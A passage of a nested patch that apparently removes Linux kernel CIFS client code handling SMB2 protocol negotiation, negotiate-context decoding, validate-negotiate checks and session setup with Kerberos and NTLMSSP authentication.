+-			+ le16_to_cpu(pctx->DataLength);
+-		/*
+-		 * 2.2.4 SMB2 NEGOTIATE Response
+-		 * Subsequent negotiate contexts MUST appear at the first 8-byte
+-		 * aligned offset following the previous negotiate context.
+-		 */
+-		if (i + 1 != ctxt_cnt)
+-			clen = ALIGN(clen, 8);
+-		if (clen > len_of_ctxts)
+-			break;
+-
+-		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES)
+-			decode_preauth_context(
+-				(struct smb2_preauth_neg_context *)pctx);
+-		else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES)
+-			rc = decode_encrypt_ctx(server,
+-				(struct smb2_encryption_neg_context *)pctx);
+-		else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES)
+-			decode_compress_ctx(server,
+-				(struct smb2_compression_capabilities_context *)pctx);
+-		else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE)
+-			server->posix_ext_supported = true;
+-		else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES)
+-			decode_signing_ctx(server,
+-				(struct smb2_signing_capabilities *)pctx);
+-		else
+-			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
+-				le16_to_cpu(pctx->ContextType));
+-		if (rc)
+-			break;
+-
+-		offset += clen;
+-		len_of_ctxts -= clen;
+-	}
+-	return rc;
+-}
+-
+-static struct create_posix *
+-create_posix_buf(umode_t mode)
+-{
+-	struct create_posix *buf;
+-
+-	buf = kzalloc(sizeof(struct create_posix),
+-			GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset =
+-		cpu_to_le16(offsetof(struct create_posix, Mode));
+-	buf->ccontext.DataLength = cpu_to_le32(4);
+-	buf->ccontext.NameOffset =
+-		cpu_to_le16(offsetof(struct create_posix, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(16);
+-
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	buf->Name[0] = 0x93;
+-	buf->Name[1] = 0xAD;
+-	buf->Name[2] = 0x25;
+-	buf->Name[3] = 0x50;
+-	buf->Name[4] = 0x9C;
+-	buf->Name[5] = 0xB4;
+-	buf->Name[6] = 0x11;
+-	buf->Name[7] = 0xE7;
+-	buf->Name[8] = 0xB4;
+-	buf->Name[9] = 0x23;
+-	buf->Name[10] = 0x83;
+-	buf->Name[11] = 0xDE;
+-	buf->Name[12] = 0x96;
+-	buf->Name[13] = 0x8B;
+-	buf->Name[14] = 0xCD;
+-	buf->Name[15] = 0x7C;
+-	buf->Mode = cpu_to_le32(mode);
+-	cifs_dbg(FYI, "mode on posix create 0%o\n", mode);
+-	return buf;
+-}
+-
+-static int
+-add_posix_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_posix_buf(mode);
+-	if (mode == ACL_NO_MODE)
+-		cifs_dbg(FYI, "Invalid mode\n");
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_posix);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_posix));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-
+-/*
+- *
+- *	SMB2 Worker functions follow:
+- *
+- *	The general structure of the worker functions is:
+- *	1) Call smb2_init (assembles SMB2 header)
+- *	2) Initialize SMB2 command specific fields in fixed length area of SMB
+- *	3) Call smb_sendrcv2 (sends request on socket and waits for response)
+- *	4) Decode SMB2 command specific fields in the fixed length area
+- *	5) Decode variable length data area (if any for this SMB2 command type)
+- *	6) Call free smb buffer
+- *	7) return
+- *
+- */
+-
+-int
+-SMB2_negotiate(const unsigned int xid,
+-	       struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_negotiate_req *req;
+-	struct smb2_negotiate_rsp *rsp;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int rc;
+-	int resp_buftype;
+-	int blob_offset, blob_length;
+-	char *security_blob;
+-	int flags = CIFS_NEG_OP;
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "Negotiate protocol\n");
+-
+-	if (!server) {
+-		WARN(1, "%s: server is NULL!\n", __func__);
+-		return -EIO;
+-	}
+-
+-	rc = smb2_plain_req_init(SMB2_NEGOTIATE, NULL, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->hdr.SessionId = 0;
+-
+-	memset(server->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
+-	memset(ses->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
+-
+-	if (strcmp(server->vals->version_string,
+-		   SMB3ANY_VERSION_STRING) == 0) {
+-		req->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
+-		req->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
+-		req->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
+-		req->DialectCount = cpu_to_le16(3);
+-		total_len += 6;
+-	} else if (strcmp(server->vals->version_string,
+-		   SMBDEFAULT_VERSION_STRING) == 0) {
+-		req->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
+-		req->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
+-		req->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
+-		req->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
+-		req->DialectCount = cpu_to_le16(4);
+-		total_len += 8;
+-	} else {
+-		/* otherwise send specific dialect */
+-		req->Dialects[0] = cpu_to_le16(server->vals->protocol_id);
+-		req->DialectCount = cpu_to_le16(1);
+-		total_len += 2;
+-	}
+-
+-	/* only one of SMB2 signing flags may be set in SMB2 request */
+-	if (ses->sign)
+-		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
+-	else if (global_secflags & CIFSSEC_MAY_SIGN)
+-		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
+-	else
+-		req->SecurityMode = 0;
+-
+-	req->Capabilities = cpu_to_le32(server->vals->req_capabilities);
+-	if (ses->chan_max > 1)
+-		req->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
+-
+-	/* ClientGUID must be zero for SMB2.02 dialect */
+-	if (server->vals->protocol_id == SMB20_PROT_ID)
+-		memset(req->ClientGUID, 0, SMB2_CLIENT_GUID_SIZE);
+-	else {
+-		memcpy(req->ClientGUID, server->client_guid,
+-			SMB2_CLIENT_GUID_SIZE);
+-		if ((server->vals->protocol_id == SMB311_PROT_ID) ||
+-		    (strcmp(server->vals->version_string,
+-		     SMB3ANY_VERSION_STRING) == 0) ||
+-		    (strcmp(server->vals->version_string,
+-		     SMBDEFAULT_VERSION_STRING) == 0))
+-			assemble_neg_contexts(req, server, &total_len);
+-	}
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	rsp = (struct smb2_negotiate_rsp *)rsp_iov.iov_base;
+-	/*
+-	 * No tcon so can't do
+-	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
+-	 */
+-	if (rc == -EOPNOTSUPP) {
+-		cifs_server_dbg(VFS, "Dialect not supported by server. Consider  specifying vers=1.0 or vers=2.0 on mount for accessing older servers\n");
+-		goto neg_exit;
+-	} else if (rc != 0)
+-		goto neg_exit;
+-
+-	rc = -EIO;
+-	if (strcmp(server->vals->version_string,
+-		   SMB3ANY_VERSION_STRING) == 0) {
+-		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
+-			cifs_server_dbg(VFS,
+-				"SMB2 dialect returned but not requested\n");
+-			goto neg_exit;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
+-			cifs_server_dbg(VFS,
+-				"SMB2.1 dialect returned but not requested\n");
+-			goto neg_exit;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
+-			/* ops set to 3.0 by default for default so update */
+-			server->ops = &smb311_operations;
+-			server->vals = &smb311_values;
+-		}
+-	} else if (strcmp(server->vals->version_string,
+-		   SMBDEFAULT_VERSION_STRING) == 0) {
+-		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
+-			cifs_server_dbg(VFS,
+-				"SMB2 dialect returned but not requested\n");
+-			goto neg_exit;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
+-			/* ops set to 3.0 by default for default so update */
+-			server->ops = &smb21_operations;
+-			server->vals = &smb21_values;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
+-			server->ops = &smb311_operations;
+-			server->vals = &smb311_values;
+-		}
+-	} else if (le16_to_cpu(rsp->DialectRevision) !=
+-				server->vals->protocol_id) {
+-		/* if requested single dialect ensure returned dialect matched */
+-		cifs_server_dbg(VFS, "Invalid 0x%x dialect returned: not requested\n",
+-				le16_to_cpu(rsp->DialectRevision));
+-		goto neg_exit;
+-	}
+-
+-	cifs_dbg(FYI, "mode 0x%x\n", rsp->SecurityMode);
+-
+-	if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb2.0 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb2.1 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB30_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb3.0 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB302_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb3.02 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb3.1.1 dialect\n");
+-	else {
+-		cifs_server_dbg(VFS, "Invalid dialect returned by server 0x%x\n",
+-				le16_to_cpu(rsp->DialectRevision));
+-		goto neg_exit;
+-	}
+-
+-	rc = 0;
+-	server->dialect = le16_to_cpu(rsp->DialectRevision);
+-
+-	/*
+-	 * Keep a copy of the hash after negprot. This hash will be
+-	 * the starting hash value for all sessions made from this
+-	 * server.
+-	 */
+-	memcpy(server->preauth_sha_hash, ses->preauth_sha_hash,
+-	       SMB2_PREAUTH_HASH_SIZE);
+-
+-	/* SMB2 only has an extended negflavor */
+-	server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
+-	/* set it to the maximum buffer size value we can send with 1 credit */
+-	server->maxBuf = min_t(unsigned int, le32_to_cpu(rsp->MaxTransactSize),
+-			       SMB2_MAX_BUFFER_SIZE);
+-	server->max_read = le32_to_cpu(rsp->MaxReadSize);
+-	server->max_write = le32_to_cpu(rsp->MaxWriteSize);
+-	server->sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	if ((server->sec_mode & SMB2_SEC_MODE_FLAGS_ALL) != server->sec_mode)
+-		cifs_dbg(FYI, "Server returned unexpected security mode 0x%x\n",
+-				server->sec_mode);
+-	server->capabilities = le32_to_cpu(rsp->Capabilities);
+-	/* Internal types */
+-	server->capabilities |= SMB2_NT_FIND | SMB2_LARGE_FILES;
+-
+-	/*
+-	 * SMB3.0 supports only 1 cipher and doesn't have a encryption neg context
+-	 * Set the cipher type manually.
+-	 */
+-	if (server->dialect == SMB30_PROT_ID && (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		server->cipher_type = SMB2_ENCRYPTION_AES128_CCM;
+-
+-	security_blob = smb2_get_data_area_len(&blob_offset, &blob_length,
+-					       (struct smb2_hdr *)rsp);
+-	/*
+-	 * See MS-SMB2 section 2.2.4: if no blob, client picks default which
+-	 * for us will be
+-	 *	ses->sectype = RawNTLMSSP;
+-	 * but for time being this is our only auth choice so doesn't matter.
+-	 * We just found a server which sets blob length to zero expecting raw.
+-	 */
+-	if (blob_length == 0) {
+-		cifs_dbg(FYI, "missing security blob on negprot\n");
+-		server->sec_ntlmssp = true;
+-	}
+-
+-	rc = cifs_enable_signing(server, ses->sign);
+-	if (rc)
+-		goto neg_exit;
+-	if (blob_length) {
+-		rc = decode_negTokenInit(security_blob, blob_length, server);
+-		if (rc == 1)
+-			rc = 0;
+-		else if (rc == 0)
+-			rc = -EIO;
+-	}
+-
+-	if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
+-		if (rsp->NegotiateContextCount)
+-			rc = smb311_decode_neg_context(rsp, server,
+-						       rsp_iov.iov_len);
+-		else
+-			cifs_server_dbg(VFS, "Missing expected negotiate contexts\n");
+-	}
+-neg_exit:
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int smb3_validate_negotiate(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-	int rc;
+-	struct validate_negotiate_info_req *pneg_inbuf;
+-	struct validate_negotiate_info_rsp *pneg_rsp = NULL;
+-	u32 rsplen;
+-	u32 inbuflen; /* max of 4 dialects */
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	cifs_dbg(FYI, "validate negotiate\n");
+-
+-	/* In SMB3.11 preauth integrity supersedes validate negotiate */
+-	if (server->dialect == SMB311_PROT_ID)
+-		return 0;
+-
+-	/*
+-	 * validation ioctl must be signed, so no point sending this if we
+-	 * can not sign it (ie are not known user).  Even if signing is not
+-	 * required (enabled but not negotiated), in those cases we selectively
+-	 * sign just this, the first and only signed request on a connection.
+-	 * Having validation of negotiate info  helps reduce attack vectors.
+-	 */
+-	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
+-		return 0; /* validation requires signing */
+-
+-	if (tcon->ses->user_name == NULL) {
+-		cifs_dbg(FYI, "Can't validate negotiate: null user mount\n");
+-		return 0; /* validation requires signing */
+-	}
+-
+-	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
+-		cifs_tcon_dbg(VFS, "Unexpected null user (anonymous) auth flag sent by server\n");
+-
+-	pneg_inbuf = kmalloc(sizeof(*pneg_inbuf), GFP_NOFS);
+-	if (!pneg_inbuf)
+-		return -ENOMEM;
+-
+-	pneg_inbuf->Capabilities =
+-			cpu_to_le32(server->vals->req_capabilities);
+-	if (tcon->ses->chan_max > 1)
+-		pneg_inbuf->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
+-
+-	memcpy(pneg_inbuf->Guid, server->client_guid,
+-					SMB2_CLIENT_GUID_SIZE);
+-
+-	if (tcon->ses->sign)
+-		pneg_inbuf->SecurityMode =
+-			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
+-	else if (global_secflags & CIFSSEC_MAY_SIGN)
+-		pneg_inbuf->SecurityMode =
+-			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
+-	else
+-		pneg_inbuf->SecurityMode = 0;
+-
+-
+-	if (strcmp(server->vals->version_string,
+-		SMB3ANY_VERSION_STRING) == 0) {
+-		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
+-		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
+-		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
+-		pneg_inbuf->DialectCount = cpu_to_le16(3);
+-		/* SMB 2.1 not included so subtract one dialect from len */
+-		inbuflen = sizeof(*pneg_inbuf) -
+-				(sizeof(pneg_inbuf->Dialects[0]));
+-	} else if (strcmp(server->vals->version_string,
+-		SMBDEFAULT_VERSION_STRING) == 0) {
+-		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
+-		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
+-		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
+-		pneg_inbuf->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
+-		pneg_inbuf->DialectCount = cpu_to_le16(4);
+-		/* structure is big enough for 4 dialects */
+-		inbuflen = sizeof(*pneg_inbuf);
+-	} else {
+-		/* otherwise specific dialect was requested */
+-		pneg_inbuf->Dialects[0] =
+-			cpu_to_le16(server->vals->protocol_id);
+-		pneg_inbuf->DialectCount = cpu_to_le16(1);
+-		/* structure is big enough for 4 dialects, sending only 1 */
+-		inbuflen = sizeof(*pneg_inbuf) -
+-				sizeof(pneg_inbuf->Dialects[0]) * 3;
+-	}
+-
+-	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+-		FSCTL_VALIDATE_NEGOTIATE_INFO,
+-		(char *)pneg_inbuf, inbuflen, CIFSMaxBufSize,
+-		(char **)&pneg_rsp, &rsplen);
+-	if (rc == -EOPNOTSUPP) {
+-		/*
+-		 * Old Windows versions or Netapp SMB server can return
+-		 * not supported error. Client should accept it.
+-		 */
+-		cifs_tcon_dbg(VFS, "Server does not support validate negotiate\n");
+-		rc = 0;
+-		goto out_free_inbuf;
+-	} else if (rc != 0) {
+-		cifs_tcon_dbg(VFS, "validate protocol negotiate failed: %d\n",
+-			      rc);
+-		rc = -EIO;
+-		goto out_free_inbuf;
+-	}
+-
+-	rc = -EIO;
+-	if (rsplen != sizeof(*pneg_rsp)) {
+-		cifs_tcon_dbg(VFS, "Invalid protocol negotiate response size: %d\n",
+-			      rsplen);
+-
+-		/* relax check since Mac returns max bufsize allowed on ioctl */
+-		if (rsplen > CIFSMaxBufSize || rsplen < sizeof(*pneg_rsp))
+-			goto out_free_rsp;
+-	}
+-
+-	/* check validate negotiate info response matches what we got earlier */
+-	if (pneg_rsp->Dialect != cpu_to_le16(server->dialect))
+-		goto vneg_out;
+-
+-	if (pneg_rsp->SecurityMode != cpu_to_le16(server->sec_mode))
+-		goto vneg_out;
+-
+-	/* do not validate server guid because not saved at negprot time yet */
+-
+-	if ((le32_to_cpu(pneg_rsp->Capabilities) | SMB2_NT_FIND |
+-	      SMB2_LARGE_FILES) != server->capabilities)
+-		goto vneg_out;
+-
+-	/* validate negotiate successful */
+-	rc = 0;
+-	cifs_dbg(FYI, "validate negotiate info successful\n");
+-	goto out_free_rsp;
+-
+-vneg_out:
+-	cifs_tcon_dbg(VFS, "protocol revalidation - security settings mismatch\n");
+-out_free_rsp:
+-	kfree(pneg_rsp);
+-out_free_inbuf:
+-	kfree(pneg_inbuf);
+-	return rc;
+-}
+-
+-enum securityEnum
+-smb2_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
+-{
+-	switch (requested) {
+-	case Kerberos:
+-	case RawNTLMSSP:
+-		return requested;
+-	case NTLMv2:
+-		return RawNTLMSSP;
+-	case Unspecified:
+-		if (server->sec_ntlmssp &&
+-			(global_secflags & CIFSSEC_MAY_NTLMSSP))
+-			return RawNTLMSSP;
+-		if ((server->sec_kerberos || server->sec_mskerberos) &&
+-			(global_secflags & CIFSSEC_MAY_KRB5))
+-			return Kerberos;
+-		fallthrough;
+-	default:
+-		return Unspecified;
+-	}
+-}
+-
+-struct SMB2_sess_data {
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct nls_table *nls_cp;
+-	void (*func)(struct SMB2_sess_data *);
+-	int result;
+-	u64 previous_session;
+-
+-	/* we will send the SMB in three pieces:
+-	 * a fixed length beginning part, an optional
+-	 * SPNEGO blob (which can be zero length), and a
+-	 * last part which will include the strings
+-	 * and rest of bcc area. This allows us to avoid
+-	 * a large buffer 17K allocation
+-	 */
+-	int buf0_type;
+-	struct kvec iov[2];
+-};
+-
+-static int
+-SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct smb2_sess_setup_req *req;
+-	unsigned int total_len;
+-	bool is_binding = false;
+-
+-	rc = smb2_plain_req_init(SMB2_SESSION_SETUP, NULL, server,
+-				 (void **) &req,
+-				 &total_len);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	if (is_binding) {
+-		req->hdr.SessionId = cpu_to_le64(ses->Suid);
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-		req->PreviousSessionId = 0;
+-		req->Flags = SMB2_SESSION_REQ_FLAG_BINDING;
+-		cifs_dbg(FYI, "Binding to sess id: %llx\n", ses->Suid);
+-	} else {
+-		/* First session, not a reauthenticate */
+-		req->hdr.SessionId = 0;
+-		/*
+-		 * if reconnect, we need to send previous sess id
+-		 * otherwise it is 0
+-		 */
+-		req->PreviousSessionId = cpu_to_le64(sess_data->previous_session);
+-		req->Flags = 0; /* MBZ */
+-		cifs_dbg(FYI, "Fresh session. Previous: %llx\n",
+-			 sess_data->previous_session);
+-	}
+-
+-	/* enough to enable echos and oplocks and one max size write */
+-	req->hdr.CreditRequest = cpu_to_le16(130);
+-
+-	/* only one of SMB2 signing flags may be set in SMB2 request */
+-	if (server->sign)
+-		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_REQUIRED;
+-	else if (global_secflags & CIFSSEC_MAY_SIGN) /* one flag unlike MUST_ */
+-		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED;
+-	else
+-		req->SecurityMode = 0;
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	req->Capabilities = cpu_to_le32(SMB2_GLOBAL_CAP_DFS);
+-#else
+-	req->Capabilities = 0;
+-#endif /* DFS_UPCALL */
+-
+-	req->Channel = 0; /* MBZ */
+-
+-	sess_data->iov[0].iov_base = (char *)req;
+-	/* 1 for pad */
+-	sess_data->iov[0].iov_len = total_len - 1;
+-	/*
+-	 * This variable will be used to clear the buffer
+-	 * allocated above in case of any error in the calling function.
+-	 */
+-	sess_data->buf0_type = CIFS_SMALL_BUFFER;
+-
+-	return 0;
+-}
+-
+-static void
+-SMB2_sess_free_buffer(struct SMB2_sess_data *sess_data)
+-{
+-	struct kvec *iov = sess_data->iov;
+-
+-	/* iov[1] is already freed by caller */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
+-		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
+-
+-	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-}
+-
+-static int
+-SMB2_sess_sendreceive(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_rqst rqst;
+-	struct smb2_sess_setup_req *req = sess_data->iov[0].iov_base;
+-	struct kvec rsp_iov = { NULL, 0 };
+-
+-	/* Testing shows that buffer offset must be at location of Buffer[0] */
+-	req->SecurityBufferOffset =
+-		cpu_to_le16(sizeof(struct smb2_sess_setup_req) - 1 /* pad */);
+-	req->SecurityBufferLength = cpu_to_le16(sess_data->iov[1].iov_len);
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = sess_data->iov;
+-	rqst.rq_nvec = 2;
+-
+-	/* BB add code to build os and lm fields */
+-	rc = cifs_send_recv(sess_data->xid, sess_data->ses,
+-			    sess_data->server,
+-			    &rqst,
+-			    &sess_data->buf0_type,
+-			    CIFS_LOG_ERROR | CIFS_SESS_OP, &rsp_iov);
+-	cifs_small_buf_release(sess_data->iov[0].iov_base);
+-	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
+-
+-	return rc;
+-}
+-
+-static int
+-SMB2_sess_establish_session(struct SMB2_sess_data *sess_data)
+-{
+-	int rc = 0;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	cifs_server_lock(server);
+-	if (server->ops->generate_signingkey) {
+-		rc = server->ops->generate_signingkey(ses, server);
+-		if (rc) {
+-			cifs_dbg(FYI,
+-				"SMB3 session key generation failed\n");
+-			cifs_server_unlock(server);
+-			return rc;
+-		}
+-	}
+-	if (!server->session_estab) {
+-		server->sequence_number = 0x2;
+-		server->session_estab = true;
+-	}
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "SMB2/3 session established successfully\n");
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_UPCALL
+-static void
+-SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct cifs_spnego_msg *msg;
+-	struct key *spnego_key = NULL;
+-	struct smb2_sess_setup_rsp *rsp = NULL;
+-	bool is_binding = false;
+-
+-	rc = SMB2_sess_alloc_buffer(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	spnego_key = cifs_get_spnego_key(ses, server);
+-	if (IS_ERR(spnego_key)) {
+-		rc = PTR_ERR(spnego_key);
+-		if (rc == -ENOKEY)
+-			cifs_dbg(VFS, "Verify user has a krb5 ticket and keyutils is installed\n");
+-		spnego_key = NULL;
+-		goto out;
+-	}
+-
+-	msg = spnego_key->payload.data[0];
+-	/*
+-	 * check version field to make sure that cifs.upcall is
+-	 * sending us a response in an expected form
+-	 */
+-	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
+-		cifs_dbg(VFS, "bad cifs.upcall version. Expected %d got %d\n",
+-			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
+-		rc = -EKEYREJECTED;
+-		goto out_put_spnego_key;
+-	}
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* keep session key if binding */
+-	if (!is_binding) {
+-		kfree_sensitive(ses->auth_key.response);
+-		ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+-						 GFP_KERNEL);
+-		if (!ses->auth_key.response) {
+-			cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
+-				 msg->sesskey_len);
+-			rc = -ENOMEM;
+-			goto out_put_spnego_key;
+-		}
+-		ses->auth_key.len = msg->sesskey_len;
+-	}
+-
+-	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
+-	sess_data->iov[1].iov_len = msg->secblob_len;
+-
+-	rc = SMB2_sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out_put_spnego_key;
+-
+-	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+-	/* keep session id and flags if binding */
+-	if (!is_binding) {
+-		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
+-		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
+-	}
+-
+-	rc = SMB2_sess_establish_session(sess_data);
+-out_put_spnego_key:
+-	key_invalidate(spnego_key);
+-	key_put(spnego_key);
+-	if (rc) {
+-		kfree_sensitive(ses->auth_key.response);
+-		ses->auth_key.response = NULL;
+-		ses->auth_key.len = 0;
+-	}
+-out:
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-	SMB2_sess_free_buffer(sess_data);
+-}
+-#else
+-static void
+-SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+-{
+-	cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
+-	sess_data->result = -EOPNOTSUPP;
+-	sess_data->func = NULL;
+-}
+-#endif
+-
+-static void
+-SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data);
+-
+-static void
+-SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct smb2_sess_setup_rsp *rsp = NULL;
+-	unsigned char *ntlmssp_blob = NULL;
+-	bool use_spnego = false; /* else use raw ntlmssp */
+-	u16 blob_length = 0;
+-	bool is_binding = false;
+-
+-	/*
+-	 * If memory allocation is successful, caller of this function
+-	 * frees it.
+-	 */
+-	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
+-	if (!ses->ntlmssp) {
+-		rc = -ENOMEM;
+-		goto out_err;
+-	}
+-	ses->ntlmssp->sesskey_per_smbsess = true;
+-
+-	rc = SMB2_sess_alloc_buffer(sess_data);
+-	if (rc)
+-		goto out_err;
+-
+-	rc = build_ntlmssp_smb3_negotiate_blob(&ntlmssp_blob,
+-					  &blob_length, ses, server,
+-					  sess_data->nls_cp);
+-	if (rc)
+-		goto out;
+-
+-	if (use_spnego) {
+-		/* BB eventually need to add this */
+-		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	sess_data->iov[1].iov_base = ntlmssp_blob;
+-	sess_data->iov[1].iov_len = blob_length;
+-
+-	rc = SMB2_sess_sendreceive(sess_data);
+-	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+-
+-	/* If true, rc here is expected and not an error */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
+-		rsp->hdr.Status == STATUS_MORE_PROCESSING_REQUIRED)
+-		rc = 0;
+-
+-	if (rc)
+-		goto out;
+-
+-	if (offsetof(struct smb2_sess_setup_rsp, Buffer) !=
+-			le16_to_cpu(rsp->SecurityBufferOffset)) {
